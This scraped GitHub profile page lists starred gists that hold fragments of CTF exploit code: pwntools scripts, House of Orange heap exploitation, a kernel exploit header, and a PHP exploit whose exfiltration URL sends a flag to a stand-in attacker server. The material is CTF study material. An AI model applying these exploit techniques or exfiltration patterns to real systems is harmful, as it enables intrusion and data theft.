Skip to content

Instantly share code, notes, and snippets.

View elnx's full-sized avatar
🖖
What's happening?

elnx

🖖
What's happening?
194 followers · 1.4k following
  • /dev/null
View GitHub Profile
@laxa
laxa / EasiestPrintf.py
Created March 20, 2017 00:22
easiestprintf@0ctf2k17
#!/usr/bin/env python2
from pwn import *
###
if len(sys.argv) > 1:
DEBUG = False
else:
DEBUG = True
@inaz2
inaz2 / house_of_orange.c
Last active December 22, 2017 16:16
House of Orange attack / http://4ngelboy.blogspot.jp/2016/10/hitcon-ctf-qual-2016-house-of-orange.html
$ gcc house_of_orange.c -o house_of_orange
house_of_orange.c: In function ‘main’:
house_of_orange.c:39:29: warning: assignment makes pointer from integer without a cast [-Wint-conversion]
*(void **)(p1+0x80+0x8) = 0x61; /* fake size to set main_arena->bins[10] */
^
house_of_orange.c:42:30: warning: assignment makes pointer from integer without a cast [-Wint-conversion]
*(void **)(p1+0x80+0x30) = -1;
^
$ ./house_of_orange
@eboda
eboda / exploit.php
Last active December 29, 2017 22:52
34C3 CTF urlstorage exploit
<?php
$target = 'http://127.0.0.1/';
$exploit = 'http://yourserver:1337/exploit.php';
$exfil = 'http://yourserver:1337/FLAG=';
function enc($s) {
$res = '';
for ($i = 0; $i < strlen($s); $i++) {
$res .= '\\' . dechex(ord($s[$i]));
}
@Jinmo
Jinmo / README.md
Created August 7, 2017 01:02
Working on it

Disassembler

Let's make disassembler, easier.

1. Template parser

Template with simplicity, let's keep it simple.

mov $reg, $reg
@eboda
eboda / doit
Last active June 13, 2018 06:10
34C3 CTF minbashmaxfun exploit
nc minbashmaxfun 1337 -v <<<$(python solve.py file dump_flag.sh )
@peternguyen93
peternguyen93 / ghost_in_the_heap.py
Created November 8, 2017 14:42
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
# p = Pwn(mode=1,port=8887)
p = Pwn(mode=1,host='52.193.196.17',port=56746)
def select(op):
p.read_until('Your choice: ')
@syjcnss
syjcnss / exploit.c
Created June 5, 2017 08:20
exploit for cred_jar
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <pthread.h>
#define ALLOC_CTX _IO('t', 1)
@Jinmo
Jinmo / yey.py
Last active May 17, 2019 01:20
loading IDA colors (clr) file given a path to the file
from ctypes import c_ssize_t, c_void_p, c_int, c_void_p, create_string_buffer, cast, WINFUNCTYPE, CFUNCTYPE, windll, cdll, CDLL
from PyQt5.QtCore import Qt, QTimer, QObject
from PyQt5.QtGui import QResizeEvent, QFocusEvent
from PyQt5.QtWidgets import QWidget, QDialog, QDialogButtonBox, QPushButton, qApp
import os
import sys
import idaapi
import idc
@mozfreddyb
mozfreddyb / innerhtml-hook.js
Last active November 6, 2019 08:55
inspect assignments to innerHTML
/* inject via
ppmm.loadFrameScript("data:,<js source>", true);
(where ppmm is the message manager, e.g. in shell.js)
framescript documentation explains why this works[1] and
the message manager docs[2] explain that the parent process
manager defined as ppmm in shell.js[3] can be used.
[1] https://developer.mozilla.org/en-US/Firefox/Multiprocess_Firefox/Frame_script_loading_and_lifetime
@saelo
saelo / pwn.py
Last active December 15, 2019 23:35
Solution for "assignment" of GoogleCTF 2017
#!/usr/bin/env python3
#
# Exploit for "assignment" of GoogleCTF 2017
#
# CTF-quality exploit...
#
# Slightly simplified and shortened explanation:
#
# The bug is a UAF of one or both values during add_assign() if a GC is
# triggered during allocate_value(). The exploit first abuses this to leak a